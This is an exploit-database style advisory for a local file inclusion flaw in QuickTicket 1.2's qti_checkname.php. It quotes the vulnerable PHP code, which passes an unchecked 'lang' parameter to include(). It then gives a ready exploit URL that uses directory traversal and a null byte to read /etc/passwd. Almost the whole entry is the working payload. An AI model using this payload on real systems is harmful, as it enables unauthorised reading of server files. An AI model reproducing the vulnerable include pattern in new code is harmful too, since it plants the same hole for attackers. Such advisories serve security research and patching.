id: 1984
date: 06/26/2007
title: QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability
author: Katatafish
cves: 

======================================================================
QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability
======================================================================



###QuickTicket v1.2 Local File Inclusion###

#download: http://www.qt-cute.org/download/qti12.zip

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploit:
 http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #